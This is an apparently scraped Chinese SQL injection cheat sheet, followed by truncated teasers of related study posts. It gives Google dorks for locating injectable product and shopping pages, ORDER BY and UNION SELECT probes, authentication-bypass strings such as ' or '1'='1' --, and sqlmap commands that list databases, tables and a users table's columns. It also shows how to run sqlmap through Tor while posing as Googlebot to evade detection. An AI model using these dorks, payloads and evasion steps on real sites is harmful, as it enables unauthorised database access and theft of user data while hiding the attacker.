參考文章
參考學習:google search:
inurl:"products.php?prodid="
inurl:buy.php?category=
+order+by+1
+order+by+6
+union+select+1,2,3,4,5,6,7,8,9,10,11
有時伺服器不能直接理解@@ version命令,需要轉換它。您將需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替換@@版本。
sqlmap -u --time-sec 15
sqlmap -u --dbs
sqlmap -u -d acuart --tables
sqlmap -u -d acuart -t users --columns
sql注入攻擊的型別
經典sqli
盲注或推斷sql注入資料庫管理系統
特定的sqli
復合sqli
sql注入+認證不足
sql注入+ ddos 攻擊
sql注入+ dns劫持
sql注入+ xss
錯誤過濾的轉義字元
當使用者輸入未針對轉義字元 進行過濾時,會發生這種形式的sql注入 ,然後將其傳遞到sql語句
statement = "select*from users where name ='" + username + "';"
使用注釋甚至阻止查詢的其餘部分(有三種型別的sql注釋)。所有三行最後都有乙個空格:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
and substring(@@version,1,1)=4
apt-get instal tor
torsqlmap -u --tor --tor-type=socks5
偽裝成googlebot:
sqlmap -u --tor --tor-type=socks5 --user-agent="googlebot (compatible; googlebot/2.1; +"
SQL注入學習
通常情況下,可能存在 sql 注入漏洞的 url 是類似這種形式 對 sql 注入的判斷,主要有兩個方面 可能存在 sql 注入攻擊的 asp php jsp 動態網頁中,乙個動態網頁中可能只有乙個引數,有時可能有多個引數。有時是整型引數,有時是字串型引數,不能一概而論。總之只要是帶有引數的 動態網...
SQL注入學習
2018 02 03 grant 授權語句 revoke 取消許可權 get 方式url的後面可以跟上?query語句 post方式可以上傳檔案或表單 cookie 需要關注的注入點 構造語句 admin or 1 1 回顯 使用union聯合語句 正常可執行 不正常會報錯 不回顯的叫盲注 whal...
關於SQL注入學習
知道sql injection 但是平時懶的去做這方面的東西,以後一定還得注意 net的專案看來要用儲存過程和分層方式來寫了 sql injection 講解 方法 網上蒐集 1.帶引數的的儲存過程來完成使用者驗證的過程 2.使用者通過 提交過來的變數引數進行檢查的 發現客戶端提交的引數中有 exe...